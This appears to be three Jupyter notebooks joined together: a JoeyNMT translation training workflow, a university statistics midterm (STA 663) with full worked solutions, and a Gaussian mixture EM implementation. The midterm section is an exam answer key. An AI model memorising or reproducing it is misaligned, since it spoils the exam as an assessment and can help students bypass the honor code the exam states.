Stored in directory: /root/.cache/pip/wheels/e4/76/4d/a95b8dd7b452b69e8ed4f68b69e1b55e12c9c9624dd962b191
Successfully built joeynmt pyyaml
Installing collected packages: portalocker, sacrebleu, subword-nmt, pyyaml, mccabe, lazy-object-proxy, typed-ast, astroid, isort, pylint, joeynmt
Found existing installation: PyYAML 3.13
Uninstalling PyYAML-3.13:
Successfully uninstalled PyYAML-3.13
Successfully installed astroid-2.3.3 isort-4.3.21 joeynmt-0.0.1 lazy-object-proxy-1.4.3 mccabe-0.6.1 portalocker-1.5.2 pylint-2.4.4 pyyaml-5.3 sacrebleu-1.4.3 subword-nmt-0.3.7 typed-ast-1.4.1
###Markdown
Preprocessing the Data into Subword BPE Tokens- One of the most powerful improvements for agglutinative languages (a feature of most Bantu languages) is using BPE tokenization [ (Sennrich, 2015) ](https://arxiv.org/abs/1508.07909).- It was also shown that by optimizing the number of BPE codes we significantly improve results for low-resourced languages [(Sennrich, 2019)](https://www.aclweb.org/anthology/P19-1021) [(Martinus, 2019)](https://arxiv.org/abs/1906.05685)- Below we have the scripts for doing BPE tokenization of our data. We use 4000 tokens as recommended by [(Sennrich, 2019)](https://www.aclweb.org/anthology/P19-1021). You do not need to change anything. Simply running the below will be suitable.
###Code
# One of the huge boosts in NMT performance was to use a different method of tokenizing.
# Usually, NMT would tokenize by words. However, using a method called BPE gave amazing boosts to performance
# Do subword NMT
from os import path
os.environ["src"] = source_language # Sets them in bash as well, since we often use bash scripts
os.environ["tgt"] = target_language
# Learn BPEs on the training data.
os.environ["data_path"] = path.join("joeynmt", "data", source_language + target_language) # Herman!
! subword-nmt learn-joint-bpe-and-vocab --input train.$src train.$tgt -s 4000 -o bpe.codes.4000 --write-vocabulary vocab.$src vocab.$tgt
# Apply BPE splits to the development and test data.
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$src < train.$src > train.bpe.$src
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$tgt < train.$tgt > train.bpe.$tgt
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$src < dev.$src > dev.bpe.$src
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$tgt < dev.$tgt > dev.bpe.$tgt
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$src < test.$src > test.bpe.$src
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$tgt < test.$tgt > test.bpe.$tgt
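# (Illustrative note: the .bpe.* files now contain each word segmented into subword units
# learned from the 4000 BPE merge operations above, with "@@ " marking word-internal splits.)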
# Create directory, move everything we care about to the correct location
! mkdir -p $data_path
! cp train.* $data_path
! cp test.* $data_path
! cp dev.* $data_path
! cp bpe.codes.4000 $data_path
! ls $data_path
# Also move everything we care about to a mounted location in google drive (relevant if running in colab) at gdrive_path
! cp train.* "$gdrive_path"
! cp test.* "$gdrive_path"
! cp dev.* "$gdrive_path"
! cp bpe.codes.4000 "$gdrive_path"
! ls "$gdrive_path"
# Create that vocab using build_vocab
! sudo chmod 777 joeynmt/scripts/build_vocab.py
! joeynmt/scripts/build_vocab.py joeynmt/data/$src$tgt/train.bpe.$src joeynmt/data/$src$tgt/train.bpe.$tgt --output_path joeynmt/data/$src$tgt/vocab.txt
# Some output
! echo "BPE Isoko Sentences"
! tail -n 5 test.bpe.$tgt
! echo "Combined BPE Vocab"
! tail -n 10 joeynmt/data/$src$tgt/vocab.txt # Herman
! cp joeynmt/data/$src$tgt/vocab.txt "$gdrive_path"
# Also move everything we care about to a mounted location in google drive (relevant if running in colab) at gdrive_path
! cp train.* "$gdrive_path"
! cp test.* "$gdrive_path"
! cp dev.* "$gdrive_path"
! cp bpe.codes.4000 "$gdrive_path"
! ls "$gdrive_path"
###Output
bpe.codes.4000 dev.en test.bpe.iso test.iso train.en
dev.bpe.en dev.iso test.en train.bpe.en train.iso
dev.bpe.iso test.bpe.en test.en-any.en train.bpe.iso vocab.txt
###Markdown
Creating the JoeyNMT ConfigJoeyNMT requires a yaml config. We provide a template below. We've also set a number of defaults that you may play with!- We used Transformer architecture - We set our dropout reasonably high: 0.3 (recommended in [(Sennrich, 2019)](https://www.aclweb.org/anthology/P19-1021))Things worth playing with:- The batch size (also recommended to change for low-resourced languages)- The number of epochs (we've set it at 30 just so it runs in about an hour, for testing purposes)- The decoder options (beam_size, alpha)- Evaluation metrics (BLEU versus chrF)
###Code
# This creates the config file for our JoeyNMT system. It might seem overwhelming so we've provided a couple of useful parameters you'll need to update
# (You can of course play with all the parameters if you'd like!)
name = '%s%s' % (source_language, target_language)
gdrive_path = os.environ["gdrive_path"]
# Create the config
config = """
name: "{name}_transformer"
data:
src: "{source_language}"
trg: "{target_language}"
train: "{gdrive_path}/train.bpe"
dev: "{gdrive_path}/dev.bpe"
test: "{gdrive_path}/test.bpe"
level: "bpe"
lowercase: False
max_sent_length: 100
src_vocab: "{gdrive_path}/vocab.txt"
trg_vocab: "{gdrive_path}/vocab.txt"
testing:
beam_size: 5
alpha: 1.0
training:
load_model: "{gdrive_path}/models/{name}_transformer_orig/142000.ckpt" # if uncommented, load a pre-trained model from this checkpoint
random_seed: 42
optimizer: "adam"
normalization: "tokens"
adam_betas: [0.9, 0.999]
scheduling: "plateau" # TODO: try switching from plateau to Noam scheduling
patience: 5 # For plateau: decrease learning rate by decrease_factor if validation score has not improved for this many validation rounds.
learning_rate_factor: 0.5 # factor for Noam scheduler (used with Transformer)
learning_rate_warmup: 1000 # warmup steps for Noam scheduler (used with Transformer)
decrease_factor: 0.7
loss: "crossentropy"
learning_rate: 0.0003
learning_rate_min: 0.00000001
weight_decay: 0.0
label_smoothing: 0.1
batch_size: 4096
batch_type: "token"
eval_batch_size: 3600
eval_batch_type: "token"
batch_multiplier: 1
early_stopping_metric: "ppl"
epochs: 45 # TODO: Decrease for when playing around and checking of working. Around 30 is sufficient to check if its working at all
validation_freq: 1000 # TODO: Set to at least once per epoch.
logging_freq: 100
eval_metric: "bleu"
model_dir: "{gdrive_path}/models/{name}_transformer"
overwrite: True # TODO: Set to True if you want to overwrite possibly existing models.
shuffle: True
use_cuda: True
max_output_length: 100
print_valid_sents: [0, 1, 2, 3]
keep_last_ckpts: 3
model:
initializer: "xavier"
bias_initializer: "zeros"
init_gain: 1.0
embed_initializer: "xavier"
embed_init_gain: 1.0
tied_embeddings: True
tied_softmax: True
encoder:
type: "transformer"
num_layers: 6
num_heads: 4 # TODO: Increase to 8 for larger data.
embeddings:
embedding_dim: 256 # TODO: Increase to 512 for larger data.
scale: True
dropout: 0.2
# typically ff_size = 4 x hidden_size
hidden_size: 256 # TODO: Increase to 512 for larger data.
ff_size: 1024 # TODO: Increase to 2048 for larger data.
dropout: 0.3
decoder:
type: "transformer"
num_layers: 6
num_heads: 4 # TODO: Increase to 8 for larger data.
embeddings:
embedding_dim: 256 # TODO: Increase to 512 for larger data.
scale: True
dropout: 0.2
# typically ff_size = 4 x hidden_size
hidden_size: 256 # TODO: Increase to 512 for larger data.
ff_size: 1024 # TODO: Increase to 2048 for larger data.
dropout: 0.3
""".format(name=name, gdrive_path=os.environ["gdrive_path"], source_language=source_language, target_language=target_language)
with open("joeynmt/configs/transformer_{name}.yaml".format(name=name),'w') as f:
f.write(config)
! cp joeynmt/configs/transformer_$src$tgt.yaml "$gdrive_path"
###Output
_____no_output_____
###Markdown
Train the ModelThis single line of joeynmt runs the training using the config we made above
###Code
# Train the model
# You can press Ctrl-C to stop. And then run the next cell to save your checkpoints!
# !cd joeynmt; python3 -m joeynmt train configs/transformer_$src$tgt.yaml
!python3 -m joeynmt train "$gdrive_path/transformer_$src$tgt.yaml"
# Copy the created models from the notebook storage to google drive for persistant storage
# !cp -r joeynmt/models/${src}${tgt}_transformer/* "$gdrive_path/models/${src}${tgt}_transformer/"
# Output our validation accuracy epoch 1-30
! cat "$gdrive_path/models/${src}${tgt}_transformer/validations.txt"
# Output our validation accuracy last 45 epochs (upto ~100, step 250000)
! cat "$gdrive_path/models/${src}${tgt}_transformer/validations.txt"
# Test our model
! cd joeynmt; python3 -m joeynmt test "$gdrive_path/models/${src}${tgt}_transformer/config.yaml"
###Output
2020-01-18 02:53:15,890 Hello! This is Joey-NMT.
2020-01-18 02:53:41,222 dev bleu: 32.58 [Beam search decoding with beam size = 5 and alpha = 1.0]
2020-01-18 02:54:16,562 test bleu: 38.05 [Beam search decoding with beam size = 5 and alpha = 1.0]
|
exams/.ipynb_checkpoints/Midterm_Exams_Solutions_Notes-checkpoint.ipynb | ###Markdown
STA 663 Midterm ExamsPlease observe the Duke honor code for this **closed book** exam.**Permitted exceptions to the closed book rule**- You may use any of the links accessible from the Help Menu for reference - that is, you may follow a chain of clicks from the landing pages of the sites accessible through the Help Menu. If you find yourself outside the help/reference pages of `python`, `ipython`, `numpy`, `scipy`, `matplotlib`, `sympy`, `pandas`, (e.g. on a Google search page or stackoverflow or current/past versions of the STA 663 notes) you are in danger of violating the honor code and should exit immediately.- You may also use TAB or SHIFT-TAB completion, as well as `?foo`, `foo?` and `help(foo)` for any function, method or class `foo`.The total points allocated is 125, but the maximum possible is 100. Hence it is possible to score 100 even with some errors or incomplete solutions.
###Code
%matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy.linalg as la
from collections import Counter
from functools import reduce
###Output
_____no_output_____
###Markdown
**1**. (10 points)Read the flights data at https://raw.githubusercontent.com/mwaskom/seaborn-data/master/flights.csv into a `pandas` data frame. Find the average number of passengers per quarter (Q1, Q2, Q3, Q4) across the years 1950-1959 (inclusive of 1950 and 1959), where- Q1 = Jan, Feb, Mar- Q2 = Apr, May, Jun- Q3 = Jul, Aug, Sep- Q4 = Oct, Nov, Dec
###Code
url = 'https://raw.githubusercontent.com/mwaskom/seaborn-data/master/flights.csv'
data = pd.read_csv(url)
data.head()
mapper = {
'January': 'Q1',
'February': 'Q1',
'March': 'Q1',
'April': 'Q2',
'May': 'Q2',
'June': 'Q2',
'July': 'Q3',
'August': 'Q3',
'September': 'Q3',
'October': 'Q4',
'November': 'Q4',
'December': 'Q4',
}
data = data.replace({'month': mapper})
data = data[(data.year >= 1950) & (data.year <= 1959)]
data.groupby('month')[['passengers']].mean()
###Output
_____no_output_____
###Markdown
**2**. (10 points)The Collatz sequence is defined by the following rules for finding the next number```if the current number is even, divide by 2if the current number is odd, multiply by 3 and add 1if the current number is 1, stop```- Find the starting integer that gives the longest Collatz sequence for integers in the range(1, 10000). What is the starting number and length of this Collatz sequence?
###Code
def collatz(n):
"""Collatz sequence."""
vals = [n]
while n != 1:
if n % 2 == 0:
n //= 2
else:
n = 3*n + 1
vals.append(n)
return vals
max(((n, len(collatz(n))) for n in range(1, 10000)), key=lambda x: x[1])
###Output
_____no_output_____
###Markdown
**3**. (10 points)Recall that a covariance matrix is a matrix whose entries are$$\text{Cov}(X_i, X_j) = \frac{1}{n-1} \sum_{k=1}^{n} (x_{ki} - \bar{x}_i)(x_{kj} - \bar{x}_j)$$Find the sample covariance matrix of the 4 features of the **iris** data set at http://bit.ly/2ow0oJO using basic `numpy` operations on `ndarrays`. Do **not** use the `np.cov` or equivalent functions in `pandas` (except for checking). Remember to scale by $1/(n-1)$ for the sample covariance.
###Code
url = 'http://bit.ly/2ow0oJO'
iris = pd.read_csv(url)
iris.head()
X = iris.values[:, :4].astype('float')
X -= X.mean(axis=0)
(X.T @ X)/(X.shape[0]-1)
np.cov(X, rowvar=False)
###Output
_____no_output_____
###Markdown
**4**. (10 points)How many numbers in `range(100, 10000)` are divisible by 17 after you square them and add 1? Find this out using only **lambda** functions, **map**, **filter** and **reduce** on `xs`, where `xs = range(100, 10000)`.In pseudo-code, you want to achieve```pythonxs = range(100, 10000)count(y for y in (x**2 + 1 for x in xs) if y % 17 == 0)```
###Code
xs = range(100, 10000)
reduce(lambda a, b: a + b,
map(lambda x: 1,
filter(lambda x: x % 17 == 0,
map(lambda x: x**2+1, xs))))
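# Cross-check with a plain generator expression (illustrative; should equal the reduce result above)
check = sum(1 for x in xs if (x**2 + 1) % 17 == 0)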
###Output
_____no_output_____
###Markdown
**5**. (20 points)- Given the DNA sequence below, create a $4 \times 4$ transition matrix $A$ where $A[i,j]$ is the probability of the base $j$ appearing immediately after base $i$. Note that a *base* is one of the four letters `a`, `c`, `t` or `g`. The letters below should be treated as a single sequence, broken into separate lines just for formatting purposes. You should check that row probabilities sum to 1. (10 points)- Find the steady state distribution of the 4 bases from the row stochastic transition matrix - that is, the values of $x$ for which $x^T A = x^T$ (You can solve this as a set of linear equations). Hint: you need to add a constraint on the values of $x$. (10 points)```gggttgtatgtcacttgagcctgtgcggacgagtgacacttgggacgtgaacagcggcggccgatacgttctctaagatcctctcccatgggcctggtctgtatggctttcttgttgtgggggcggagaggcagcgagtgggtgtacattaagcatggccaccaccatgtggagcgtggcgtggtcgcggagttggcagggtttttgggggtggggagccggttcaggtattccctccgcgtttctgtcgggtaggggggcttctcgtaagggattgctgcggccgggttctctgggccgtgatgactgcaggtgccatggaggcggtttggggggcccccggaagtctagcgggatcgggcttcgtttgtggaggagggggcgagtgcggaggtgttct```
###Code
dna = ''.join('''gggttgtatgtcacttgagcctgtgcggacgagtgacacttgggacgtgaacagcggcggccgatacgttctctaagatc
ctctcccatgggcctggtctgtatggctttcttgttgtgggggcggagaggcagcgagtgggtgtacattaagcatggcc
accaccatgtggagcgtggcgtggtcgcggagttggcagggtttttgggggtggggagccggttcaggtattccctccgc
gtttctgtcgggtaggggggcttctcgtaagggattgctgcggccgggttctctgggccgtgatgactgcaggtgccatg
gaggcggtttggggggcccccggaagtctagcgggatcgggcttcgtttgtggaggagggggcgagtgcggaggtgttct'''.split())
d = {}
for i, j in zip(dna[:], dna[1:]):
d[(i, j)] = d.get((i, j), 0) + 1
d
A = np.array([[d[(i, j)] for j in 'actg'] for i in 'actg'])
A
A = A / A.sum(axis=1)[:, None]
A
A.sum(axis=1)
###Output
_____no_output_____
###Markdown
Solution using least squares
###Code
A1 = np.r_[A.T - np.eye(4), [[1,1,1,1]]]
A1
b = np.r_[0,0,0,0,1].reshape(-1,1)
np.linalg.lstsq(A1, b, rcond=None)[0]
###Output
_____no_output_____
###Markdown
Alternative solution using eigendecomposition
###Code
e, v = np.linalg.eig(A.T)
e, v
s = v[:, 0] / v[:, 0].sum()
s.reshape(-1,1)
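# Illustrative check: a stationary distribution satisfies s @ A ~= s.
# (This assumes the unit eigenvalue is in column 0; otherwise pick the column where np.isclose(e, 1).)
stationary_ok = np.allclose(s @ A, s)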
###Output
_____no_output_____
###Markdown
**6**. (10 points)- Find the matrix $A$ that rotates the standard vectors in $\mathbb{R}^2$ by 30 degrees counter-clockwise, stretches $e_1$ by a factor of 3, and contracts $e_2$ by a factor of $0.5$. - What is the inverse of this matrix? How you find the inverse should reflect your understanding.The effects of the matrix $A$ and $A^{-1}$ are shown in the figure below:
###Code
theta = 30 * np.pi/180
r = np.array([
[np.cos(theta), -np.sin(theta)],
[np.sin(theta), np.cos(theta)]
])
s = np.diag([3, 0.5])
m = r @ s
minv = np.diag(1/np.diag(s)) @ r.T
m
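# Sanity check (illustrative): since the rotation is orthogonal, m @ minv = r @ s @ s^-1 @ r.T = I.
assert np.allclose(m @ minv, np.eye(2))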
m1 = m @ np.eye(2)
m1
m2 = minv @ m1
plt.figure(figsize=(11, 2))
plt.subplot(131)
plt.axis([-1, 3, -0.2, 2])
for v in np.eye(2).T:
plt.arrow(*np.r_[[0,0],v],
head_width=0.05, head_length=0.1, fc='k', ec='k')
plt.xticks([0,1])
plt.yticks([0,1])
plt.title('$I_2$')
plt.subplot(132)
plt.axis([-1, 3, -0.2, 2])
for v in m1.T:
plt.arrow(*np.r_[[0,0],v],
head_width=0.05, head_length=0.1, fc='k', ec='k')
plt.xticks([0,1])
plt.yticks([0,1])
plt.title('$AI_2$')
plt.subplot(133)
plt.axis([-1, 3, -0.2, 2])
for v in m2.T:
plt.arrow(*np.r_[[0,0],v],
head_width=0.05, head_length=0.1, fc='k', ec='k')
plt.xticks([0,1])
plt.yticks([0,1])
plt.title('$A^{-1}(AI_2)$')
plt.savefig('vecs.png')
pass
###Output
_____no_output_____
###Markdown
**7**. (55 points) We observe some data points $(x_i, y_i)$, and believe that an appropriate model for the data is that$$f(x) = ax^2 + bx^3 + c\sin{x}$$with some added noise. Find optimal values of the parameters $\beta = (a, b, c)$ that minimize $\Vert y - f(x) \Vert^2$1. using `scipy.linalg.lstsq` (10 points)2. solving the normal equations $X^TX \beta = X^Ty$ (10 points)3. using `scipy.linalg.svd` (10 points)4. using gradient descent with RMSProp (no bias correction) and starting with an initial value of $\beta = \begin{bmatrix}1 & 1 & 1\end{bmatrix}$. Use a learning rate of 0.01 and 10,000 iterations. This should take a few seconds to complete. (25 points)In each case, plot the data and fitted curve using `matplotlib`.Data```x = array([ 3.4027718 , 4.29209002, 5.88176277, 6.3465969 , 7.21397852, 8.26972154, 10.27244608, 10.44703778, 10.79203455, 14.71146298])y = array([ 25.54026428, 29.4558919 , 58.50315846, 70.24957254, 90.55155435, 100.56372833, 91.83189927, 90.41536733, 90.43103028, 23.0719842 ])```
###Code
x = np.array([ 3.4027718 , 4.29209002, 5.88176277, 6.3465969 , 7.21397852,
8.26972154, 10.27244608, 10.44703778, 10.79203455, 14.71146298])
y = np.array([ 25.54026428, 29.4558919 , 58.50315846, 70.24957254,
90.55155435, 100.56372833, 91.83189927, 90.41536733,
90.43103028, 23.0719842 ])
def f(beta, x):
"""Model function."""
return beta[0]*x**2 + beta[1]*x**3 + beta[2]*np.sin(x)
###Output
_____no_output_____
###Markdown
Using `lstsq`
###Code
X = np.c_[x**2, x**3, np.sin(x)]
beta = np.linalg.lstsq(X, y, rcond=None)[0]
beta
plt.plot(x, y, 'o')
xp = np.linspace(0, 15, 100)
plt.plot(xp, f(beta, xp))
pass
###Output
_____no_output_____
###Markdown
Using normal equations
###Code
beta = np.linalg.solve(X.T @ X, X.T @ y)
beta
plt.plot(x, y, 'o')
xp = np.linspace(0, 15, 100)
plt.plot(xp, f(beta, xp))
pass
###Output
_____no_output_____
###Markdown
Using SVD
###Code
U, s, Vt = np.linalg.svd(X)
beta = Vt.T @ np.diag(1/s) @ U[:, :len(s)].T @ y.reshape(-1,1)
beta
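# Cross-check against numpy's pseudo-inverse (illustrative); the two solutions should agree.
beta_pinv = np.linalg.pinv(X) @ y.reshape(-1, 1)
assert np.allclose(beta, beta_pinv)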
plt.plot(x, y, 'o')
xp = np.linspace(0, 15, 100)
plt.plot(xp, f(beta, xp))
pass
###Output
_____no_output_____
###Markdown
Using gradient descent with RMSprop
###Code
def res(beta, x, y):
"""Resdiual funciton."""
return f(beta, x) - y
def grad(beta, x, y):
"""Gradient of function."""
return np.array([
np.sum(x**2 * res(beta, x, y)),
np.sum(x**3 * res(beta, x, y)),
np.sum(np.sin(x) * res(beta, x, y))
])
def gd(beta, x, y, f, grad, alpha=0.01):
"""Gradient descent."""
v = 0
for i in range(10000):
v = 0.9 * v + 0.1 * grad(beta, x, y)**2
beta = beta - (alpha * grad(beta, x, y))/(np.sqrt(v) + 1e-8)
return beta
beta = gd(np.array([1,1,1]), x, y, f, grad)
beta
plt.plot(x, y, 'o')
xp = np.linspace(0, 15, 100)
plt.plot(xp, f(beta, xp))
pass
###Output
_____no_output_____ |
notebook/evaluation_chocoball_detector.ipynb | ###Markdown
About: Evaluate the trained ChocoBallDetector model. The evaluation metric is the MSE of the detected chocoball counts, since counting chocoballs is the goal.
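For reference, a minimal sketch of the count-based MSE described above, assuming per-image predicted and ground-truth chocoball counts are available as plain lists (the real computation happens inside `ChocoEvaluator.evaluate_chocoball_number`, whose internals are not shown here):

```python
import numpy as np

# hypothetical per-image counts; the real values come from the detector and the annotations
pred_counts = [14, 15, 13]
true_counts = [14, 15, 14]

mse = np.mean((np.array(pred_counts) - np.array(true_counts)) ** 2)
print(f"count MSE: {mse:.3f}")
```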
###Code
%config Completer.use_jedi = False
from ipywidgets import interact
import ipywidgets as widgets
import logging
from src import util
from src.preprocessor import ChocoPreProcessor
from src.evaluator import ChocoEvaluator
%matplotlib inline
import matplotlib.pyplot as plt
%load_ext autoreload
%autoreload 2
logger = logging.getLogger(__name__)
util.set_logger(logger)
IMG_DIR = "../data/test"
BBOX_DIR = "../data/test"
CLASSES_FILE = "../data/classes.txt"
OUT = "../out"
MODEL = "../out/choco_faster_rcnn.npz"
###Output
_____no_output_____
###Markdown
Preprocessing the evaluation data
###Code
choco_prep = ChocoPreProcessor(logger=logger)
choco_prep.set_classes(class_file=CLASSES_FILE)
dataset = choco_prep.set_dataset(anno_dir=BBOX_DIR, img_dir=IMG_DIR)
bboxs = choco_prep.get_bbox_list()
imgs = choco_prep.get_img_array()
obj_ids = choco_prep.get_object_ids_list()
classes = choco_prep.get_object_classes()
print(imgs.shape)
###Output
2021-03-25 13:33:40,989 - __main__ - INFO - annotation_file_path: ../data/test
2021-03-25 13:33:40,991 - __main__ - INFO - image_file_path: ../data/test
2021-03-25 13:33:40,993 - __main__ - INFO - annotation_file_size: 7
100%|██████████| 7/7 [00:00<00:00, 188.08it/s]
###Markdown
Running the evaluation
###Code
ce = ChocoEvaluator(gpu=0)
ce.load_model(model_file=MODEL)
%%time
res_list, mse = ce.evaluate_chocoball_number(images=imgs, true_labels=obj_ids)
print(f"Evaluation Images: {imgs.shape[0]}")
print(f"MSE: {mse}")
###Output
Evaluation Images: 7
MSE: 0.0
###Markdown
Visualizing the inference results
###Code
def visualize_detect_image(idx):
fig = plt.figure(figsize=(12, 4))
_ = ce.vis_detect_image(res_list[idx], vis_score=True, fig=fig)
plt.show()
interact(
visualize_detect_image,
idx=widgets.Dropdown(options=list(range(imgs.shape[0])),
value=3,
description="dataset idx")
)
###Output
_____no_output_____ |
notebooks/finance/Historical_Stock_Data.ipynb | ###Markdown
Historical Stock Data. The purpose of this notebook is to download historical trading data for a selected group of stocks for use with other notebooks. The trading data is stored as individual `.csv` files in a designated directory.
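As a quick check that the saved files can be consumed by other notebooks, a downloaded file can be read back with pandas. This is a minimal sketch that assumes the `data_dir` and ticker-symbol file naming defined below, and that the download cells have already been run:

```python
import os
import pandas as pd

data_dir = 'data_stocks'   # same directory as defined below
ticker = 'AAPL'            # any previously downloaded symbol

# each file is the raw Alpha Vantage daily series, indexed by date
S = pd.read_csv(os.path.join(data_dir, ticker + '.csv'), index_col=0, parse_dates=True)
print(S.tail())
```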
###Code
data_dir = 'data_stocks'
djia = ['AXP','BA','CAT','CSCO','CVX','DD','DIS','GE', \
'GS','HD','IBM','INTC','JNJ','JPM','KO','MCD', \
'MMM','MRK','MSFT','NKE','PFE','PG','T','TRV', \
'UNH','UTX','V','VZ','WMT','XOM']
favs = ['AAPL']
stocks = djia + favs
import os
os.makedirs(data_dir, exist_ok=True)
###Output
_____no_output_____
###Markdown
Alpha Vantage. The following cells retrieve a history of daily trading data for a specified set of stock ticker symbols. These functions use the free [Alpha Vantage](https://www.alphavantage.co/) data service. The service requires a personal API key which can be claimed [here](https://www.alphavantage.co/support/api-key) in just a few seconds. Place the key as a string in a file `api_key.txt` in the same directory as this notebook (note: api_key.txt is not distributed with the github repository). The function `api_key()` returns the key stored in `api_key.txt`.
###Code
def api_key():
"Read api_key.txt and return api_key"
try:
with open('api_key.txt') as fp:
line = fp.readline()
except:
raise RuntimeError('Error while attempting to read api_key.txt')
return line.strip()
###Output
_____no_output_____
###Markdown
The function `alphavantage(s)` returns a pandas dataframe holding historical trading data for the stock ticker symbol specified by `s`.
###Code
import os
import requests
import pandas as pd
def alphavantage(symbol=None):
if symbol is None:
raise ValueError("No symbol has been provided")
payload = {
"function": "TIME_SERIES_DAILY_ADJUSTED",
"symbol": symbol,
"outputsize": "full",
"datatype": "json",
"apikey": api_key(),
}
api_url = "https://www.alphavantage.co/query"
try:
response = requests.get(api_url, params=payload)
except:
raise ValueError("No response using api key: " + api_key)
data = response.json()
k = list(data.keys())
metadata = data[k[0]]
timeseries = data[k[1]]
S = pd.DataFrame.from_dict(timeseries).T
S = S.apply(pd.to_numeric)
S.columns = [h.lstrip('12345678. ') for h in S.columns]
return S
alphavantage('AAPL').head()
###Output
_____no_output_____
###Markdown
`get_stock_data(symbols)` retrieves trading data for a list of symbols and stores each in a separate file in the data directory. The file name is the ticker symbol with a `.csv` suffix.
###Code
def get_stock_data(symbols, service=alphavantage):
if isinstance(symbols, str):
symbols = [symbols]
assert all(isinstance(s, str) for s in symbols)
for s in symbols:
print('downloading', s, end='')
k = 3
while k > 0:
try:
k -= 1
S = service(s)
S.to_csv(os.path.join(data_dir, s + '.csv'))
print(' success')
break
except:
print(' fail', end='')
print('')
get_stock_data(['AAPL'])
###Output
downloading AAPL success
###Markdown
Download Selected Ticker Symbols
###Code
get_stock_data(stocks)
###Output
downloading AXP success
downloading BA success
downloading CAT success
downloading CSCO success
downloading CVX success
downloading DD fail
fail
fail
downloading DIS success
downloading GE success
downloading GS success
downloading HD success
downloading IBM success
downloading INTC success
downloading JNJ success
downloading JPM success
downloading KO success
downloading MCD success
downloading MMM success
downloading MRK success
downloading MSFT success
downloading NKE success
downloading PFE success
downloading PG success
downloading T success
downloading TRV success
downloading UNH success
downloading UTX success
downloading V success
downloading VZ success
downloading WMT success
downloading XOM success
downloading AAPL success
|
notebooks(colab)/Classic_models/GMM_RU.ipynb | ###Markdown
Initialization
###Code
#@markdown - **Mount GoogleDrive**
from google.colab import drive
drive.mount('GoogleDrive')
# #@markdown - **Unmount**
# !fusermount -u GoogleDrive
###Output
_____no_output_____
###Markdown
Code area
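For reference, these are the standard EM updates for a $K$-component Gaussian mixture, which the `GaussianMM` class below follows (its unnormalized density drops the usual constant factors, including the $\tfrac{1}{2}$ in the exponent, so its responsibilities differ slightly from the textbook form).

E-step (responsibilities):

$$\gamma_{ij} = \frac{\alpha_j\,\mathcal{N}(x_i \mid \mu_j, \Sigma_j)}{\sum_{k=1}^{K} \alpha_k\,\mathcal{N}(x_i \mid \mu_k, \Sigma_k)}$$

M-step (parameter updates):

$$\mu_j = \frac{\sum_i \gamma_{ij}\,x_i}{\sum_i \gamma_{ij}}, \qquad \Sigma_j = \frac{\sum_i \gamma_{ij}\,(x_i-\mu_j)(x_i-\mu_j)^T}{\sum_i \gamma_{ij}}, \qquad \alpha_j = \frac{1}{N}\sum_i \gamma_{ij}$$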
###Code
#@title Gaussian mixture model { display-mode: "both" }
# This program estimates the parameters of a Gaussian mixture model with the EM algorithm
# Gaussian mixture model for clustering stochastic data
# coding: utf-8
import numpy as np
import numpy.matlib
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
#@markdown - **Data bunch**
class Bunch(dict):
def __init__(self,*args,**kwds):
super(Bunch,self).__init__(*args,**kwds)
self.__dict__ = self
#@markdown - **Gaussian mixture model class**
class GaussianMM:
def __init__(self):
self.mu = None
self.sigma = None
self.alpha = None
self.f_dim = None
self.num_mixed = None
    # Initialization
def init_fn(self, f_dim=3, num_mixed=4):
self.f_dim = f_dim
self.num_mixed = num_mixed
self.mu = np.random.randn(num_mixed, f_dim) + 10
self.sigma = np.zeros((num_mixed, f_dim, f_dim))
for i in range(num_mixed):
self.sigma[i, :, :] = np.diag(np.random.randint(10, 25, size=(3, )))
self.alpha = [1. / num_mixed] * int(num_mixed)
return 'Initialization completed !'
# e-step
def e_step(self, X):
N, _ = X.shape
expec = np.zeros((N, self.num_mixed))
for i in range(N):
denom = 0
# numer = 0
F_list = []
S_list = []
for j in range(self.num_mixed):
sig_inv = np.linalg.inv(self.sigma[j, :, :])
expo_1 = np.matmul(-(X[i, :] - self.mu[j, :]), sig_inv)
expo_2 = np.matmul(expo_1, ((X[i, :] - self.mu[j, :])).reshape(-1, 1))
first_half = self.alpha[j] * np.exp(expo_2)
# first_half = alpha_[j] * np.exp(-(X[i, :] - mu[j, :]) * sig_inv * ((X[i, :] - mu[j, :])).reshape(-1, 1))
sec_half = np.sqrt(np.linalg.det(np.mat(self.sigma[j, :, :])))
F_list.append(first_half[0])
S_list.append(sec_half)
denom += first_half[0] / sec_half # знаменатель
for j in range(self.num_mixed):
numer = F_list[j] / S_list[j] # числитель
expec[i, j]= numer / denom # ожидание
return expec
# m-step
def m_step(self, X, expec):
N, c = X.shape
lemda = 1e-15
for j in range(self.num_mixed):
denom = 0 # знаменатель
numer = 0 # числитель
sig = 0
for i in range(N):
numer += expec[i, j] * X[i, :]
denom += expec[i, j]
self.mu[j, :] = numer / denom # среднее значение
for i in range(N):
x_tran = (X[i, :] - self.mu[j, :]).reshape(-1, 1)
x_nor = (X[i, :] - self.mu[j, :]).reshape(1, -1)
sig += expec[i, j] * np.matmul(x_tran, x_nor)
self.alpha[j] = denom / N # коэффициенты модели смесей
self.sigma[j, :, :] = sig / denom + np.diag(np.array([lemda] * c))
return self.mu, self.sigma, self.alpha
    # Training
def fit(self, X, err_mu=5, err_alpha=0.01, max_iter=100):
iter_num = 0
while True:
if iter_num == max_iter: break
iter_num += 1
mu_prev = self.mu.copy()
# print(mu_prev)
alpha_prev = self.alpha.copy()
# print(alpha_prev)
expec = self.e_step(X)
self.mu, self.sigma, self.alpha = self.m_step(X, expec)
print(u"Количество итераций:", iter_num)
print(u"Оценка средних значений:\n", self.mu)
print(u"Оценка коэффициенты модели смесей:\n", self.alpha, '\n')
err = abs(mu_prev - self.mu).sum() # ошибки
err_a = abs(np.array(alpha_prev) - np.array(self.alpha)).sum()
if (err < err_mu) and (err_a < err_alpha):
print(u"\nКонечные ошибки:", [err, err_a])
break
print('Обучение завершено !')
    # Prediction
def predict(self, X):
expec = self.e_step(X)
return np.argmax(expec, axis=1)
#@markdown - **Stochastic data generator**
